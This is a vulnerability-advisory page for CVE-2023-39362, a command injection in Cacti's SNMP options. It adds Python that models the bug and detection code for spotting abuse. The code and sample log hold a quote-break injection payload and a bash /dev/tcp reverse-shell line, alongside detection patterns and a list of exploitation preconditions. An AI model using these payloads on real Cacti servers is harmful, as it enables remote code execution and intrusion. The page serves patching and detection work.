CVE-2023-39362
Published 2023-09-05
Priority P2 (70) · Severity high · CVSS 3.1 base score 7.2
Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
Exploit: public PoC indexed · EPSS 82.19% (99.6th percentile)
Cacti is an open source operational monitoring and fault management framework. In Cacti 1.2.24, under certain conditions, an authenticated privileged user can use a malicious string in the SNMP options of a Device to perform command injection and obtain remote code execution on the underlying server. The `lib/snmp.php` file has a set of functions, with similar behavior, that accept some variables as input and place them into an `exec` call without proper escaping or validation. This issue has been addressed in version 1.2.25. Users are advised to upgrade. There are no known workarounds for this vulnerability.
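To make the bug class concrete, the following Python model is added here as an example. It is not Cacti's PHP: the exact snmpget flags, the choice of the community string as the injected option and the single-quote layout are assumptions. It builds the Net-SNMP command line the way a string-concatenating `exec()` caller does and the way an escaping caller does (`shlex.quote()` stands in for PHP's `escapeshellarg()`), then splits each resulting line into the simple commands `/bin/sh` would actually run, which is the difference between one `snmpget` and `snmpget` plus whatever the attacker appended.

```python
"""Model of the CVE-2023-39362 bug class: an SNMP Device option interpolated
into a shell command string that exec() hands to /bin/sh.

Added example, not Cacti's code. Flags, option choice and quoting layout are
assumptions; the point is bare interpolation versus argument escaping.
"""
import shlex

# Tokens that end one simple command and start the next in sh.
SEPARATORS = {";", "&", "&&", "|", "||"}


def build_snmpget_vulnerable(host: str, community: str, oid: str) -> str:
    """Assumed vulnerable layout: the value is dropped inside single quotes
    with no escaping, so a single quote in the value closes the argument
    early and everything after it is parsed as further shell syntax."""
    return f"snmpget -O fntev -v 2c -c '{community}' {host} {oid}"


def build_snmpget_hardened(host: str, community: str, oid: str) -> str:
    """Same command with every variable passed through shlex.quote(), the
    Python analogue of PHP's escapeshellarg(): each value becomes exactly
    one shell word regardless of its contents."""
    return ("snmpget -O fntev -v 2c -c "
            f"{shlex.quote(community)} {shlex.quote(host)} {shlex.quote(oid)}")


def shell_commands(cmdline: str) -> list[list[str]]:
    """Split a command line into the simple commands (argv lists) /bin/sh
    would run: quotes group words, ; & | && || separate commands."""
    lex = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    lex.whitespace_split = True
    commands, current = [], []
    for tok in lex:
        if tok in SEPARATORS:
            commands.append(current)
            current = []
        else:
            current.append(tok)
    commands.append(current)
    return [argv for argv in commands if argv]


if __name__ == "__main__":
    host, oid = "10.0.0.20", ".1.3.6.1.2.1.1.3.0"   # constructed sample values
    payload = "'; touch /tmp/pwned; '"            # quote-break shape the page's IOCs describe
    for builder in (build_snmpget_vulnerable, build_snmpget_hardened):
        cmd = builder(host, payload, oid)
        print(builder.__name__, "->", cmd)
        for argv in shell_commands(cmd):
            print("   sh runs:", argv)
```

With the quote-break payload the vulnerable build yields three commands, the second being `touch /tmp/pwned`; the hardened build yields one, with the entire payload as the single `-c` argument. The same split makes a cheap unit test to wrap around any string-building `exec()` caller you cannot yet replace with an argv-style API.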
Affected (8 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cacti | cacti | < 1.2.25 | 1.2.25 |
| cacti | cacti | >= 0 < 1.2.16+ds1-2+deb11u2 | 1.2.16+ds1-2+deb11u2 |
| cacti | cacti | >= 0 < 1.2.24+ds1-1+deb12u1 | 1.2.24+ds1-1+deb12u1 |
| cacti | cacti | >= 0 < 1.2.25+ds1-1 | 1.2.25+ds1-1 |
| cacti | cacti | >= 0 < 1.2.25+ds1-1 | 1.2.25+ds1-1 |
| debian | cacti | < cacti 1.2.24+ds1-1+deb12u1 (bookworm) | cacti 1.2.24+ds1-1+deb12u1 (bookworm) |
| fedoraproject | fedora | — | — |
| fedoraproject | fedora | — | — |
Detection & IOCs (extracted from sources)

Detection:
- Monitor the SNMP Community String fields in Cacti Device configuration for shell metacharacters, particularly single-quote escapes and semicolons (e.g. patterns matching `\'\s*;` or `;\'`), which indicate command injection attempts.
- Alert on the Cacti poller or the PHP web process spawning unexpected child processes (e.g. bash, touch, nc) as a result of exec() calls originating from lib/snmp.php.
- Detect reverse shell attempts via /dev/tcp from Cacti server processes, consistent with the bash reverse shell payload used in exploitation of this CVE.
- Exploitation can also occur through the Cacti poller on existing devices; monitor for unexpected file creation under /tmp by the Cacti poller process.

Exploitation preconditions:
- The attacker must be authenticated with privileges to manage Devices and/or Graphs (e.g. 'Sites/Devices/Data', 'Graphs'); unauthenticated users cannot trigger this vulnerability.
- The vulnerability is only exploitable when the PHP snmp module is NOT installed; if the PHP snmp module is present, the vulnerable exec() code path in lib/snmp.php is not reached. On the Cacti host, `php -m | grep -i snmp` shows whether the module is loaded.
- A Device that supports SNMP (version 1 or 2) and has Net-SNMP Graph templates must be available; without these conditions the injection payload is not triggered.
- When exploiting via an existing device through the poller, it may be necessary to change the 'Downed Device Detection' field to a non-SNMP method, as the malicious payload could break SNMP interaction with the host.
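The following Python turns the detection indicators above into runnable checks. It is added here as an example, not a published detection rule and not Cacti code: the `ts= pid= ppid= comm= cmd="..."` record format, the sample log, the Cacti process names and the allowlist of helpers Cacti legitimately exec()s are all constructed assumptions to baseline against your own install. It flags (1) SNMP option values carrying the quote-break pattern or other shell operators, and (2) processes under Cacti's PHP web workers or poller that are not the expected Net-SNMP/rrdtool helpers, shells whose command line shows a quote-break, and anything touching /dev/tcp.

```python
"""Detection logic for CVE-2023-39362-style abuse of a Cacti host.

Added example. The process-record format, sample log, process names and
allowlist below are constructed assumptions; adapt parse_exec_line() to your
auditd/EDR export and baseline EXPECTED_CHILDREN against your own Cacti.
"""
import re
import shlex
from dataclasses import dataclass

QUOTE_BREAK = re.compile(r"'\s*;|;\s*'")      # single quote next to ';' (the page's indicator)
SHELL_META = re.compile(r"[;|&`\n]|\$\(")       # other shell operators a community string never needs
REVERSE_SHELL = re.compile(r"/dev/(tcp|udp)/")

# Cacti processes whose descendants are inspected (assumed comm names).
CACTI_PARENTS = re.compile(r"^(php-fpm[\d.]*|apache2|httpd|php|spine)$")
SHELLS = {"sh", "dash", "bash"}
# exec() runs through /bin/sh, which then runs a Net-SNMP or rrdtool binary.
EXPECTED_CHILDREN = SHELLS | {"snmpget", "snmpgetnext", "snmpwalk",
                              "snmpbulkwalk", "rrdtool", "php", "spine"}


def snmp_option_findings(value: str) -> list[str]:
    """Reasons an SNMP option value looks like an injection attempt ([] = clean)."""
    findings = []
    if QUOTE_BREAK.search(value):
        findings.append("quote-break")
    if SHELL_META.search(value):
        findings.append("shell-metachar")
    if REVERSE_SHELL.search(value):
        findings.append("dev-tcp")
    return findings


@dataclass
class Exec:
    ts: str
    pid: int
    ppid: int
    comm: str
    cmd: str


def parse_exec_line(line: str) -> Exec:
    """Parse one key=value record; cmd is double-quoted and may hold single quotes."""
    kv = dict(tok.split("=", 1) for tok in shlex.split(line))
    return Exec(kv["ts"], int(kv["pid"]), int(kv["ppid"]), kv["comm"], kv["cmd"])


def has_cacti_ancestor(ev: Exec, by_pid: dict[int, Exec]) -> bool:
    """Walk up the process tree looking for a Cacti web worker or poller."""
    pid, seen = ev.ppid, set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        if CACTI_PARENTS.match(by_pid[pid].comm):
            return True
        pid = by_pid[pid].ppid
    return False


def process_findings(log: str) -> list[tuple[int, str, list[str]]]:
    """Return (pid, comm, reasons) for each suspicious process under Cacti."""
    events = [parse_exec_line(l) for l in log.splitlines() if l.strip()]
    by_pid = {e.pid: e for e in events}
    alerts = []
    for ev in events:
        if CACTI_PARENTS.match(ev.comm) or not has_cacti_ancestor(ev, by_pid):
            continue
        reasons = []
        if REVERSE_SHELL.search(ev.cmd):
            reasons.append("reverse-shell")
        if ev.comm in SHELLS and QUOTE_BREAK.search(ev.cmd):
            reasons.append("quote-break")
        if ev.comm not in EXPECTED_CHILDREN:
            reasons.append("unexpected-child")
        if reasons:
            alerts.append((ev.pid, ev.comm, reasons))
    return alerts


# Constructed sample: a clean poll from the web worker, a quote-break
# injection from the web worker, a reverse shell from the poller, and a
# legitimate rrdtool update from the poller.
SAMPLE_LOG = """\
ts=2023-09-06T10:00:01Z pid=2001 ppid=1 comm=php-fpm8.2 cmd="php-fpm: master process"
ts=2023-09-06T10:00:01Z pid=2010 ppid=2001 comm=php-fpm8.2 cmd="php-fpm: pool www"
ts=2023-09-06T10:00:02Z pid=2100 ppid=2010 comm=sh cmd="sh -c snmpget -O fntev -v 2c -c public 10.0.0.20 .1.3.6.1.2.1.1.3.0"
ts=2023-09-06T10:00:02Z pid=2101 ppid=2100 comm=snmpget cmd="snmpget -O fntev -v 2c -c public 10.0.0.20 .1.3.6.1.2.1.1.3.0"
ts=2023-09-06T10:00:09Z pid=2110 ppid=2010 comm=sh cmd="sh -c snmpget -O fntev -v 2c -c ''; touch /tmp/pwned; '' 10.0.0.20 .1.3.6.1.2.1.1.3.0"
ts=2023-09-06T10:00:09Z pid=2111 ppid=2110 comm=touch cmd="touch /tmp/pwned"
ts=2023-09-06T10:05:00Z pid=3000 ppid=1 comm=php cmd="php /usr/share/cacti/site/poller.php"
ts=2023-09-06T10:05:01Z pid=3001 ppid=3000 comm=sh cmd="sh -c snmpget -O fntev -v 2c -c ''; bash -c 'bash -i >& /dev/tcp/10.0.0.5/4444 0>&1'; '' 10.0.0.20 .1.3.6.1.2.1.1.3.0"
ts=2023-09-06T10:05:01Z pid=3002 ppid=3001 comm=bash cmd="bash -c bash -i >& /dev/tcp/10.0.0.5/4444 0>&1"
ts=2023-09-06T10:05:02Z pid=3003 ppid=3000 comm=rrdtool cmd="rrdtool update /var/lib/cacti/rra/router_traffic_in_5.rrd N:100:200"
"""

if __name__ == "__main__":
    for v in ("public", "'; touch /tmp/pwned; '", "pub$(id)lic"):
        print(repr(v), "->", snmp_option_findings(v) or "clean")
    for pid, comm, reasons in process_findings(SAMPLE_LOG):
        print(f"ALERT pid={pid} comm={comm} reasons={reasons}")
```

On the sample the clean `snmpget` and `rrdtool` children produce nothing, while the `sh` with the quote-break command line, its `touch` child, and both processes carrying `/dev/tcp` are reported. Your own Cacti version's exec() strings may legitimately contain redirections, so baseline the shell-command check on known-good polls before wiring it to an alert.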
CVSS provenance
| Source | Score | Severity | Vector |
|---|---|---|---|
| nvd (v3.1) | 7.2 | HIGH | CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H |
| osv | 7.2 | HIGH | — |
| vendor_debian | 7.2 | HIGH | — |
Debian
CVE-2023-39362: cacti · vendor_debian · 2023 · CVSS 7.2 HIGH
Scope: local
bookworm: resolved (fixed in 1.2.24+ds1-1+deb12u1)
bullseye: resolved (fixed in 1.2.16+ds1-2+deb11u2)
forky: resolved (fixed in 1.2.25+ds1-1)
sid: resolved (fixed in
OSV
CVE-2023-39362 · osv · 2023-09-05 · CVSS 7.2 HIGH
No detection rules found.
No writeups or analysis indexed.
References
- http://packetstormsecurity.com/files/175029/Cacti-1.2.24-Command-Injection.html
- https://github.com/Cacti/cacti/security/advisories/GHSA-g6ff-58cj-x3cp
- https://lists.debian.org/debian-lts-announce/2024/03/msg00018.html
- https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CFH3J2WVBKY4ZJNMARVOWJQK6PSLPHFH/
- https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WOQFYGLZBAWT4AWNMO7DU73QXWPXTCKH/
- https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WZGB2UXJEUYWWA6IWVFQ3ZTP22FIHMGN/
- https://www.debian.org/security/2023/dsa-5550
- https://www.vicarius.io/vsociety/posts/command-injection-in-cacti-cve-2023-39362